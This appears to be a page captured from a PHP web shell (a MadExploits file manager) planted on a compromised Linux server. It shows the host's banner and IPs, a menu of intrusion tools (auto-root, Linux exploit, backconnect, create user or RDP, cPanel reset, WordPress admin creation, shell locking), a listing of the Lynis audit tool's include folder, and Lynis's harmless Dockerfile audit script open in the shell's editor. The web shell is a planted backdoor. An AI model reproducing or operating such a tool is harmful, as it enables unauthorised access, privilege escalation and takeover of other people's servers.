Linux server.kiran-academy.com 3.10.0-1160.108.1.el7.x86_64 #1 SMP Thu Jan 25 16:17:31 UTC 2024 x86_64
Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
: 194.233.91.196 | : 216.73.216.172
Cant Read [ /etc/named.conf ]
7.4.32
finalho
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
lynis /
include /
[ HOME SHELL ]
Name
Size
Permission
Action
binaries
38.36
KB
-rw-r--r--
consts
10.77
KB
-rw-r--r--
data_upload
13.63
KB
-rw-r--r--
functions
157.68
KB
-rw-r--r--
helper_audit_dockerfile
7.82
KB
-rw-r--r--
helper_configure
3.67
KB
-rw-r--r--
helper_generate
7.39
KB
-rw-r--r--
helper_show
22.29
KB
-rw-r--r--
helper_system_remote_scan
3.54
KB
-rw-r--r--
helper_update
3.59
KB
-rw-r--r--
osdetection
37.98
KB
-rw-r--r--
parameters
16.48
KB
-rw-r--r--
profiles
26.89
KB
-rw-r--r--
report
16.45
KB
-rw-r--r--
tests_accounting
25.48
KB
-rw-r--r--
tests_authentication
84.03
KB
-rw-r--r--
tests_banners
8.35
KB
-rw-r--r--
tests_boot_services
54.51
KB
-rw-r--r--
tests_containers
11.29
KB
-rw-r--r--
tests_crypto
17.67
KB
-rw-r--r--
tests_custom.template
6.78
KB
-rw-r--r--
tests_databases
23.72
KB
-rw-r--r--
tests_dns
3.39
KB
-rw-r--r--
tests_file_integrity
21.41
KB
-rw-r--r--
tests_file_permissions
3.25
KB
-rw-r--r--
tests_filesystems
46.33
KB
-rw-r--r--
tests_firewalls
29.96
KB
-rw-r--r--
tests_hardening
7.01
KB
-rw-r--r--
tests_homedirs
9.17
KB
-rw-r--r--
tests_insecure_services
26.73
KB
-rw-r--r--
tests_kernel
60.76
KB
-rw-r--r--
tests_kernel_hardening
5.62
KB
-rw-r--r--
tests_ldap
3.96
KB
-rw-r--r--
tests_logging
31.25
KB
-rw-r--r--
tests_mac_frameworks
14.53
KB
-rw-r--r--
tests_mail_messaging
21.45
KB
-rw-r--r--
tests_malware
18.44
KB
-rw-r--r--
tests_memory_processes
7.17
KB
-rw-r--r--
tests_nameservices
34.51
KB
-rw-r--r--
tests_networking
40.67
KB
-rw-r--r--
tests_php
27.48
KB
-rw-r--r--
tests_ports_packages
78.76
KB
-rw-r--r--
tests_printers_spoolers
13.85
KB
-rw-r--r--
tests_scheduling
15.74
KB
-rw-r--r--
tests_shells
13.37
KB
-rw-r--r--
tests_snmp
4.32
KB
-rw-r--r--
tests_squid
16.9
KB
-rw-r--r--
tests_ssh
17.59
KB
-rw-r--r--
tests_storage
3.74
KB
-rw-r--r--
tests_storage_nfs
8.4
KB
-rw-r--r--
tests_system_integrity
2.13
KB
-rw-r--r--
tests_time
32.61
KB
-rw-r--r--
tests_tooling
20.87
KB
-rw-r--r--
tests_usb
21.04
KB
-rw-r--r--
tests_virtualization
1.95
KB
-rw-r--r--
tests_webservers
30.9
KB
-rw-r--r--
tool_tips
2.16
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : helper_audit_dockerfile
#!/bin/sh ################################################################################# # # Lynis # ------------------ # # Copyright 2007-2013, Michael Boelen # Copyright 2007-2021, CISOfy # # Website : https://cisofy.com # Blog : http://linux-audit.com # GitHub : https://github.com/CISOfy/lynis # # Lynis comes with ABSOLUTELY NO WARRANTY. This is free software, and you are # welcome to redistribute it under the terms of the GNU General Public License. # See LICENSE file for usage of this software. # ################################################################################# if [ $# -eq 0 ]; then Display --indent 2 --text "${RED}Error: ${WHITE}Provide a file${NORMAL}" Display --text " "; Display --text " " ExitFatal else FILE=$(echo $1 | grep -E "^http|https") if HasData "${FILE}"; then echo "Provide a file (not a URL)" ExitFatal else if [ -f $1 ]; then AUDIT_FILE="$1" else Display --indent 2 --text "File $1 does not exist" ExitFatal fi fi Display --indent 2 --text "File to audit = ${AUDIT_FILE}" fi ##################################################### # ################################################################################################## # InsertSection "${SECTION_IMAGE}" PKGMGR="" FIND=$(grep "^FROM" ${AUDIT_FILE} | sed 's/ /:space:/g') for I in ${FIND}; do IMAGE=$(echo ${I} | sed 's/:space:/ /g' | awk '{ if ($1=="FROM") { print $2 }}') TAG=$(echo ${IMAGE} | cut -d':' -f2) Display --indent 2 --text "Found image:" --result "${IMAGE}" IS_DEBIAN=$(echo ${IMAGE} | grep -i debian) IS_FEDORA=$(echo ${IMAGE} | grep -i fedora) IS_UBUNTU=$(echo ${IMAGE} | grep -i ubuntu) IS_ALPINE=$(echo ${IMAGE} | grep -i alpine) IS_LATEST=$(echo ${TAG} | grep -i latest) if [ -n "${IS_DEBIAN}" ]; then IMAGE="debian"; fi if [ -n "${IS_FEDORA}" ]; then IMAGE="fedora"; fi if [ -n "${IS_UBUNTU}" ]; then IMAGE="ubuntu"; fi if [ -n "${IS_ALPINE}" ]; then IMAGE="alpine"; fi if [ -n "${IS_LATEST}" ]; then ReportWarning "dockerfile" "latest TAG used. Specifying a targeted OS image and version is better for reproducible results." fi case ${IMAGE} in "debian") LogText "Image = Debian based" PKGMGR="apt" ;; "fedora*") LogText " Image = Fedora based" PKGMGR="yum" ;; "ubuntu") LogText " Image = Ubuntu based" PKGMGR="apt" ;; "alpine") LogText " Image = Alpine based" PKGMGR="apk" ;; *) Display --indent 2 --text "Unknown image" --result "" --color YELLOW ;; esac done # ################################################################################################## # InsertSection "${SECTION_BASICS}" MAINTAINER=$(grep -E -i "*MAINTAINER" ${AUDIT_FILE} | sed 's/=/ /g' | cut -d'"' -f 2) if [ -z "${MAINTAINER}" ]; then ReportWarning "dockerfile" "No maintainer found. Unclear who created this file." else Display --indent 2 --text "Maintainer" --result "${MAINTAINER}" fi ENTRYPOINT=$(grep "^ENTRYPOINT" ${AUDIT_FILE} | cut -d' ' -f2 ) if [ -z "${ENTRYPOINT}" ]; then ReportWarning "dockerfile" "No ENTRYPOINT defined in Dockerfile." else Display --indent 2 --text "ENTRYPOINT" --result "${ENTRYPOINT}" fi FIND=$(grep "^CMD" ${AUDIT_FILE} | cut -d' ' -f2 ) if [ -z "${FIND}" ]; then ReportWarning "dockerfile" "No CMD defines in Dockerfile." else CMD=$(echo ${FIND}) Display --indent 2 --text "CMD" --result "${CMD}" fi FIND=$(grep "^USER" ${AUDIT_FILE} | cut -d' ' -f2 ) if [ -z "${FIND}" ]; then ReportWarning "dockerfile" "No user declared in Dockerfile. Container will execute command as root" else USER=$(echo ${FIND}) Display --indent 2 --text "User" --result "${USER}" fi # ################################################################################################## # InsertSection "${SECTION_SOFTWARE}" case $PKGMGR in "apt") FIND=$(grep -E "apt-get(.*) install" ${AUDIT_FILE}) if [ ! "${FIND}" = "" ]; then LogText "Found installation via apt-get" else LogText "No installations found via apt-get" fi ;; "apk") FIND=$(grep -E "apk(.*) add" ${AUDIT_FILE}) if [ ! "${FIND}" = "" ]; then LogText "Found installation via apk" else LogText "No installations found via apk" fi ;; *) LogText "Unknown package manager" ;; esac FIND=$(grep -E " (gcc|libc6-dev|make)" ${AUDIT_FILE} | grep -v "^#") if [ ! "${FIND}" = "" ]; then ReportWarning "dockerfile" "Possible development utilities found, which is not advised for production environment" LogText "Details: ${FIND}" fi # SSH FIND_OPENSSH=$(grep openssh ${AUDIT_FILE}) if [ ! "${FIND_OPENSSH}" = "" ]; then Display --indent 2 --text "OpenSSH" --result "FOUND" --color RED ReportSuggestion "dockerfile" "Don't use OpenSSH in container, use 'docker exec' instead" fi # ################################################################################################## # InsertSection "${SECTION_DOWNLOADS}" FILE_DOWNLOAD=0 LogText "Checking usage of cURL" FIND_CURL=$(grep curl ${AUDIT_FILE}) if [ ! "${FIND_CURL}" = "" ]; then Display --indent 4 --text "Download tool" --result "curl" FILE_DOWNLOAD=1 fi LogText "Checking usage of wget" FIND_WGET=$(grep wget ${AUDIT_FILE}) if HasData "${FIND_WGET}"; then Display --indent 4 --text "Download tool" --result "wget" FILE_DOWNLOAD=1 fi FIND=$(grep "^ADD http" ${AUDIT_FILE}) if HasData "${FIND}"; then FILE_DOWNLOAD=1 ReportWarning "dockerfile" "Found download of file via ADD. Unclear if the integrity of this file is checked, or file is signed" LogText "Details: ${FIND}" fi if [ ${FILE_DOWNLOAD} -eq 1 ]; then SSL_USED_FIND=$(grep -E "(https)" ${AUDIT_FILE}) if HasData "${SSL_USED_FIND}"; then SSL_USED="YES" COLOR="GREEN" else SSL_USED="NO" COLOR="RED" ReportSuggestion "Use SSL downloads when possible to increase security (DNSSEC, HTTPS, validation of domain, avoid MitM)" fi Display --indent 2 --text "Integrity testing performed" --result "${SSL_USED}" --color ${COLOR} HASHING_USED=$(grep -E "(sha1sum|sha256sum|sha512sum)" ${AUDIT_FILE}) Display --indent 2 --text "Hashing" --result "${HASHING_USED}" KEYS_USED=$(grep -E "(apt-key adv)" ${AUDIT_FILE}| sed 's/RUN apt-key adv//g'| sed 's/--keyserver/Key Server:/g' | sed 's/--recv/Key Value:/g') Display --indent 2 --text "Signing keys used" --result "${KEYS_USED}" Display --indent 2 --text "All downloads properly checked" --result "?" else Display --indent 2 --text "No files seems to be downloaded in this Dockerfile" fi # ################################################################################################## # InsertSection "${SECTION_PERMISSIONS}" FIND=$(grep -i "chmod 777" ${AUDIT_FILE}) if HasData "${FIND}"; then ReportWarning "dockerfile" "Warning: chmod 777 found" fi # ################################################################################################## # # Removing temp file LogText "Action: Removing temporary file ${TMP_FILE}" if [ -f ${TMP_FILE} ]; then rm -f ${TMP_FILE} fi # The End
Close